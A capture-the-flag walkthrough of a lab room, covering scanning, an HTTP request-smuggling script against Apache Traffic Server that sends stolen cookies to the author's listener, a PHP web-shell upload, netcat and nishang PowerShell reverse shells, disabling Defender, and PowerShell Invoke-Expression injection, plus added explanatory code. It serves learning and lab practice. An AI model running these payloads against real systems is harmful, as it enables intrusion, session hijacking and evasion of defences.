Host discovery

nmap -sn 10.200.130.0/24               
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-11 05:05 UTC
Nmap scan report for ip-10-200-130-10.eu-west-1.compute.internal (10.200.130.10)
Host is up (0.0015s latency).
Nmap scan report for ip-10-200-130-101.eu-west-1.compute.internal (10.200.130.101)
Host is up (0.0046s latency).
Nmap scan report for ip-10-200-130-102.eu-west-1.compute.internal (10.200.130.102)
Host is up (0.0046s latency).
Nmap scan report for ip-10-200-130-103.eu-west-1.compute.internal (10.200.130.103)
Host is up (0.0018s latency).
Nmap scan report for ip-10-200-130-104.eu-west-1.compute.internal (10.200.130.104)
Host is up (0.0046s latency).
Nmap scan report for ip-10-200-130-105.eu-west-1.compute.internal (10.200.130.105)
Host is up (0.0019s latency).
Nmap scan report for ip-10-200-130-106.eu-west-1.compute.internal (10.200.130.106)
Host is up (0.0042s latency).
Nmap scan report for ip-10-200-130-107.eu-west-1.compute.internal (10.200.130.107)
Host is up (0.0086s latency).
Nmap scan report for ip-10-200-130-108.eu-west-1.compute.internal (10.200.130.108)
Host is up (0.051s latency).
Nmap scan report for ip-10-200-130-109.eu-west-1.compute.internal (10.200.130.109)
Host is up (0.051s latency).
Nmap scan report for ip-10-200-130-110.eu-west-1.compute.internal (10.200.130.110)
Host is up (0.051s latency).
Nmap scan report for ip-10-200-130-250.eu-west-1.compute.internal (10.200.130.250)
Host is up (0.0014s latency).
Nmap done: 256 IP addresses (12 hosts up) scanned in 3.41 seconds

Port scanning

nmap --min-rate=10000 -p- 10.200.130.10
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-11 05:04 UTC
Warning: 10.200.130.10 giving up on port because retransmission cap hit (10).
Nmap scan report for ip-10-200-130-10.eu-west-1.compute.internal (10.200.130.10)
Host is up (0.0037s latency).
Not shown: 65444 closed tcp ports (reset), 77 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49670/tcp open unknown
49671/tcp open unknown
49680/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 14.76 seconds
nmap -sT -sV -sC -O -p135,139,445,3389,5985,47001,49664,49665,49666,49667,49668,49670,49671,49680 10.200.130.10 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-11 05:07 UTC
Nmap scan report for ip-10-200-130-10.eu-west-1.compute.internal (10.200.130.10)
Host is up (0.0026s latency).

PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=EC2AMAZ-A6S61FR
| Not valid before: 2023-12-08T11:01:40
|_Not valid after: 2024-06-08T11:01:40
|_ssl-date: 2023-12-11T05:09:04+00:00; -1s from scanner time.
| rdp-ntlm-info:
| Target_Name: EC2AMAZ-A6S61FR
| NetBIOS_Domain_Name: EC2AMAZ-A6S61FR
| NetBIOS_Computer_Name: EC2AMAZ-A6S61FR
| DNS_Domain_Name: EC2AMAZ-A6S61FR
| DNS_Computer_Name: EC2AMAZ-A6S61FR
| Product_Version: 10.0.17763
|_ System_Time: 2023-12-11T05:08:56+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (92%), Microsoft Windows Vista SP1 (92%), Microsoft Windows 10 1709 - 1909 (92%), Microsoft Windows Longhorn (91%), Microsoft Windows Server 2012 R2 Update 1 (91%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (91%), Microsoft Windows Server 2016 (90%), Microsoft Windows 10 1703 (90%), Microsoft Windows 7 SP1 (90%), Microsoft Windows 8 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-time:
| date: 2023-12-11T05:08:59
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.73 seconds

The room hint tells us to SSH to the .250 host.

After going through those steps it tells us the entry point is 10.200.130.110, and to add a hosts entry: bandit.escape

nmap --min-rate=10000 -p- 10.200.130.110                                                                      
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-11 05:19 UTC
Nmap scan report for ip-10-200-130-109.eu-west-1.compute.internal (10.200.130.110)
Host is up (0.039s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
631/tcp open ipp
8002/tcp open teradataordbms

Nmap done: 1 IP address (1 host up) scanned in 5.52 seconds
nmap -sT -sV -sC -O -p22,80,631,8002 10.200.130.110                                                            
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-11 10:02 UTC
Nmap scan report for ip-10-200-130-110.eu-west-1.compute.internal (10.200.130.110)
Host is up (0.0021s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 8b3aac8362c717eea4039cc79e8b76cf (RSA)
| 256 6f46f5662b04c2d76d725369911fca6d (ECDSA)
|_ 256 4feb8ab69f8df6a55faf6d83f0fbf40e (ED25519)
80/tcp open http-proxy Apache Traffic Server 7.1.1
|_http-server-header: ATS/7.1.1
|_http-title: Not Found on Accelerator
631/tcp open ipp CUPS 2.4
|_http-title: Bad Request - CUPS v2.4.5
|_http-server-header: CUPS/2.4 IPP/2.1
8002/tcp open hadoop-datanode Apache Hadoop
| hadoop-datanode-info:
|_ Logs: login.php
| hadoop-tasktracker-info:
|_ Logs: login.php
|_http-title: BANDIT
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (92%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.25 seconds

Getshell

Only port 8002 is serving a web application, so let's run a directory scan on it.

feroxbuster -u http://bandit.escape/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php

___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://bandit.escape/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [php]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200 GET 52l 224w 3302c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 1l 3w 16c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 7l 11w 162c http://bandit.escape/templates => http://bandit.escape/templates/
200 GET 7l 435w 36868c http://bandit.escape/templates/bootstrap.min.js
200 GET 6l 1415w 95992c http://bandit.escape/templates/jquery.min.js
200 GET 6l 567w 23409c http://bandit.escape/templates/bootstrap-theme.min.css
200 GET 6l 1432w 121260c http://bandit.escape/templates/bootstrap.min.css
200 GET 57l 204w 2315c http://bandit.escape/login.php
301 GET 7l 11w 162c http://bandit.escape/uploads => http://bandit.escape/uploads/
301 GET 7l 11w 162c http://bandit.escape/public => http://bandit.escape/public/
200 GET 25l 110w 960c http://bandit.escape/templates/header.php
302 GET 0l 0w 0c http://bandit.escape/upload.php => login.php
200 GET 7l 35w 284c http://bandit.escape/templates/footer.php
401 GET 1l 2w 14c http://bandit.escape/api.php
302 GET 0l 0w 0c http://bandit.escape/logout.php => index.php
301 GET 7l 11w 162c http://bandit.escape/uploads/backup => http://bandit.escape/uploads/backup/
200 GET 0l 0w 0c http://bandit.escape/auth.php
200 GET 21l 170w 1074c http://bandit.escape/LICENSE
[####################] - 20m 1102745/1102745 0s found:16 errors:0
🚨 Caught ctrl+c 🚨 saving scan state to ferox-http_bandit_escape_-1702296898.state ...
[####################] - 20m 1102745/1102745 0s found:16 errors:0
[################>---] - 20m 183190/220546 155/s http://bandit.escape/
[################>---] - 20m 183040/220546 155/s http://bandit.escape/templates/
[################>---] - 20m 182929/220546 154/s http://bandit.escape/uploads/
[################>---] - 20m 182899/220546 154/s http://bandit.escape/public/
[################>---] - 20m 181294/220546 154/s http://bandit.escape/uploads/backup/
[--------------------] - 0s 0/220546 - http://bandit.escape/templates/bootstrap.min.js

Everything found turns out to require authorization, so presumably we need to log in. The login page is a bit odd, though, so maybe XSS can be used to grab cookies.

Looking at the source of the search page, we can close the attribute with a double quote and a right angle bracket and then inject XSS:

"><script>alert('XSS');</script>

And the alert pops! But it doesn't seem possible to hijack the admin's cookies this way, since there is no interaction.

Apache Traffic Server seems to be a proxy server?

https://portswigger.net/web-security/request-smuggling

It looks like an HTTP request smuggling attack can be used, and version 7.1.1 is exploitable.

First start a listener:

nc -vlnp 8002

Write a Python script that keeps sending GET requests, again to hijack the cookie. I don't fully understand the principle yet, so I'm copying it for now (

import requests

url = "http://bandit.escape/"

# Chunked body: a zero-size chunk ends the body for a server that honours
# Transfer-Encoding, so everything after it is read as the start of the NEXT
# request on that back-end connection. The smuggled GET reflects an XSS
# payload that sends document.cookie to our listener on 10.50.127.157:8002.
# The last header line ("Whaterever:") has no trailing CRLF on purpose: the
# victim's own request line is appended to it as the header value, and the
# victim's Cookie header ends up inside the smuggled request.
body = """0

GET /?filter=a"/><script>document.write('<img+src%3d"http%3a//10.50.127.157%3a8002/test.gif%3fcookie%3d'+%2b+document.cookie+%2b+'"+/>')</script> HTTP/1.1
Whaterever:""".replace('\n', '\r\n')

# Both headers at once: the front-end proxy uses Content-Length and forwards
# the whole body, the back-end uses Transfer-Encoding and stops at the 0 chunk.
headers = {
    "Content-Length": str(len(body)),
    "Transfer-Encoding": "chunked",
}

# Keep re-poisoning the connection until the admin's next request lands on it
while True:
    r = requests.get(url, headers=headers, data=body)
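To see why the loop above ends up reading the next visitor's cookie, here is an added PowerShell example (not part of the original post or the room) that replays a constructed attacker request followed by a constructed victim request through two parsers: one that trusts Content-Length, as the front-end proxy does, and one that trusts Transfer-Encoding: chunked, as the back-end does. The victim's path and cookie value are made up, and alert(1) stands in for the cookie-exfiltrating payload the script really sends; only the framing matters here.

```powershell
# Splits one TCP stream into HTTP requests, using either Content-Length or
# Transfer-Encoding: chunked to find the end of each body. Two servers that
# disagree on which header wins produce the desync shown below.
function Split-HttpStream {
    param(
        [Parameter(Mandatory)][string]$Stream,
        [Parameter(Mandatory)][ValidateSet('ContentLength', 'Chunked')][string]$Mode
    )
    $ord = [StringComparison]::Ordinal
    $requests = @()
    $pos = 0
    while ($pos -lt $Stream.Length) {
        $hdrEnd = $Stream.IndexOf("`r`n`r`n", $pos, $ord)
        if ($hdrEnd -lt 0) {
            # Headers not finished yet: a real server keeps waiting for more bytes
            $requests += $Stream.Substring($pos)
            break
        }
        $head      = $Stream.Substring($pos, $hdrEnd - $pos)
        $bodyStart = $hdrEnd + 4
        $bodyLen   = 0
        if ($Mode -eq 'Chunked' -and $head -match '(?im)^Transfer-Encoding:\s*chunked') {
            # Walk chunk-size lines until the terminating zero-size chunk
            $p = $bodyStart
            do {
                $lineEnd = $Stream.IndexOf("`r`n", $p, $ord)
                $size    = [Convert]::ToInt32($Stream.Substring($p, $lineEnd - $p), 16)
                $p       = $lineEnd + 2 + $size + 2   # size line, data, trailing CRLF
            } while ($size -ne 0)
            $bodyLen = $p - $bodyStart
        }
        elseif ($head -match '(?im)^Content-Length:\s*(\d+)') {
            $bodyLen = [int]$Matches[1]
        }
        $requests += $Stream.Substring($pos, $bodyStart + $bodyLen - $pos)
        $pos = $bodyStart + $bodyLen
    }
    return ,$requests
}

# Constructed attacker request, shaped like the body the Python loop sends:
# a zero-size chunk, then a half-finished smuggled GET whose last header line
# has no CRLF, so whatever arrives next on the back-end connection becomes
# the value of "Whaterever:".
$smuggled = 'GET /?filter=a"><script>alert(1)</script> HTTP/1.1' + "`r`n" + 'Whaterever:'
$body     = "0`r`n`r`n" + $smuggled
$attacker = (@(
    'GET / HTTP/1.1',
    'Host: bandit.escape',
    "Content-Length: $($body.Length)",
    'Transfer-Encoding: chunked',
    '', ''
) -join "`r`n") + $body

# Constructed victim request: the admin's next page load (cookie value is made up)
$victim = @(
    'GET /index.php HTTP/1.1',
    'Host: bandit.escape',
    'Cookie: PHPSESSID=0123456789abcdef',
    '', ''
) -join "`r`n"

function Get-DesyncView {
    $stream = $attacker + $victim
    [pscustomobject]@{
        # Front-end trusts Content-Length: two clean requests, nothing suspicious
        FrontEnd = Split-HttpStream -Stream $stream -Mode ContentLength
        # Back-end trusts chunked encoding: the body ends at "0\r\n\r\n", and the
        # leftover smuggled GET swallows the victim's request line and Cookie
        BackEnd  = Split-HttpStream -Stream $stream -Mode Chunked
    }
}

$view = Get-DesyncView
"Front-end request 2 starts with: " + $view.FrontEnd[1].Split("`r`n")[0]
"Back-end request 2 as the PHP side parses it:`r`n" + $view.BackEnd[1]
```

The back-end's second request is the reflected-XSS GET with the victim's Cookie header attached, and its response goes back down the victim's connection, which is why the alert (or the cookie beacon to port 8002) fires in the admin's browser rather than ours.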

Successfully hijacked it: d6ec7d2d2a88165d7a967f9fab4af897. Stop the script and swap in the cookie. Now upload.php is accessible.

Uploading an arbitrary file says the file is too large. Trying to upload a one-line web shell also says too large, seriously.

So I found a more compact one-liner:

<?= `$_GET[1]`?>

Then intercept the request and change the filename extension to .php; the upload succeeds!

Back on the root page, the image we uploaded is displayed (I uploaded shell.php and shell.png), though its name is a string of characters plus .png; the PHP one can't be displayed because it's PHP. The leading string is the MD5 of the filename, e.g. of shell.png. Copying the image name, it can be accessed directly under the web root, which means the upload directory is the root itself. So presumably our shell.php was renamed to

echo -n "shell.php"|md5sum

Visiting it gives command execution, so let's get a reverse shell:

nc%2010.50.127.157%201234%20-e%20/bin/sh

Perfect.

Just in case, migrate into msf.

Lateral movement

As expected, we're inside Docker again.

Let's look for sensitive files in the /app directory.

Found a pair of credentials in auth.php:

safeadmin/HardcodedMeansUnguessableRight

Probably used to log in to api.php.

meterpreter > ipcofnig
[-] Unknown command: ipcofnig
meterpreter > ipconfig

Interface 1
============

Name : lo
Hardware MAC : 00:00:00:00:00:00
MTU : 65536
Flags : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0


Interface 5
============

Name : eth0
Hardware MAC : 02:42:ac:12:00:02
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 172.18.0.2
IPv4 Netmask : 255.255.0.0

Well, since we already have a shell, logging in to api.php doesn't make much sense anymore.

I originally wanted to scan the subnet,

but I found the password is reused for SSH, so that's a direct Docker escape.

And we have full privileges.

Checking /etc/hosts, there's this entry: 10.200.130.10 bandit.corp. Add it to our hosts file.

And we can ping it; that's the Windows machine we scanned at the start.

But my gut says to look for sensitive files in /root first.

In /home/ubuntu there are many programs for PSSession, apparently used for remote connections.

OK, I checked the walkthrough. There should be a ConsoleHost_history.txt under /home/ubuntu/.local/share/powershell/PSReadLine, but it isn't on this machine for some reason; maybe since it's a shared target someone deleted it as a prank (

In any case, its contents should be:

$ClearPassword = "Passw0rd"

$SecurePass = ConvertTo-SecureString $ClearPassword -AsPlainText -Force

$credential = New-Object System.Management.Automation.PSCredential("safeuserHelpDesk", $SecurePass)

Enter-PSSession -ComputerName bandit.corp -Credential $credential -ConfigurationName testHelpDesksafe -Authentication Negotiate

We can type pwsh to use PowerShell on Linux, then enter the four lines above one by one.

Hmm, we have a low-privilege session on the Windows machine. But it seems many commands can't be run.

Get-Command to see what commands we are allowed to run.

Privilege escalation

Get-ServicesApplication doesn't look like a standard built-in command:

Get-Command -ShowCommandInfo Get-ServicesApplication

Name : Get-ServicesApplication
ModuleName :
Module : @{Name=}
CommandType : Function
Definition :
param($Filter="Parameters")
$escapedInput = $Status -replace "'", "''"
Invoke-Expression "Get-Service | Select-Object -Property Name,$Filter"

[Microsoft.PowerShell.PSConsoleReadLine]::ClearHistory()

ParameterSets : {@{Name=__AllParameterSets; IsDefault=False; Parameters=System.Management.Automation.PSObject[]}}

It seems we can execute arbitrary commands, like this:

Get-ServicesApplication -Filter '$(whoami /all)'
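Why this works: the function interpolates whatever was passed in -Filter into a string and hands that string to Invoke-Expression, so a $( ... ) subexpression inside the argument gets evaluated, which is exactly what the whoami /all call above relies on. The $escapedInput line escapes a variable named $Status that is never used anywhere, so it protects nothing. Below is an added example (not the room's code; the hardened function, Test-Injection and the $global:Canary marker are mine) that shows the vulnerable function next to a version with no Invoke-Expression and a whitelist on the property names. Get-Service only exists on Windows, so run this in a Windows PowerShell session.

```powershell
# Vulnerable function as shown by Get-Command (the ClearHistory call is left
# out so the example runs without PSReadLine loaded)
function Get-ServicesApplication {
    param($Filter = "Parameters")
    $escapedInput = $Status -replace "'", "''"   # escapes the wrong variable: $Status is never used
    Invoke-Expression "Get-Service | Select-Object -Property Name,$Filter"
}

# Hardened form: no Invoke-Expression at all, and the property list is
# restricted to known Get-Service properties. Select-Object takes the array
# directly, so there is no command string for user input to land in.
function Get-ServicesApplicationSafe {
    param(
        [ValidateSet('Status', 'StartType', 'DisplayName', 'ServiceType')]
        [string[]]$Filter = @('Status')
    )
    Get-Service | Select-Object -Property (@('Name') + $Filter)
}

# The payload: a subexpression that sets a marker (assumed global variable),
# then evaluates to a valid property name so the pipeline still succeeds and
# the output looks perfectly normal to whoever is watching.
$payload = '$($global:Canary = "fired"; "Status")'

function Test-Injection {
    $global:Canary = 'untouched'
    $null = Get-ServicesApplication -Filter $payload
    $vulnerable = $global:Canary              # 'fired': the subexpression ran

    $global:Canary = 'untouched'
    try   { $null = Get-ServicesApplicationSafe -Filter $payload }
    catch { $blocked = $_.Exception.Message } # ValidateSet rejects the string
    $hardened = $global:Canary                # still 'untouched'

    [pscustomobject]@{ Vulnerable = $vulnerable; Hardened = $hardened; Rejected = $blocked }
}

Test-Injection
```

The same reasoning applies to the -enc payloads used further down: they are just longer subexpressions dropped into the same Invoke-Expression string.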

We use the well-known Invoke-PowerShellTcpOneLine.ps1 from nishang for a reverse shell, with a small tweak to the script:

$client = New-Object System.Net.Sockets.TCPClient('10.50.127.157',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
cat Invoke-PowerShellTcpOneLine.ps1| iconv -t utf-16le | base64 -w0

But first we need to turn off antivirus:

echo 'Set-MpPreference -DisableRealtimeMonitoring $true' | iconv -t utf-16le | base64 -w0
Get-ServicesApplication -Filter '$(powershell -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQAKAA==)'

Dammit, I had just gotten the shell and then the AttackBox time ran out. My shell! Ugh.

Anyway, in the end:

Get-ServicesApplication -Filter '$(powershell -enc <base64-encoded one-liner>)'

Privilege escalation succeeded.

Ramblings

This room is really quite hard, though I don't get why it was designed as a shared target, unbelievable. The initial getshell exploit was pretty hard, the privesc part was pretty hard too; in short, pretty hard. I need to properly learn PowerShell (didn't I say that a long time ago?)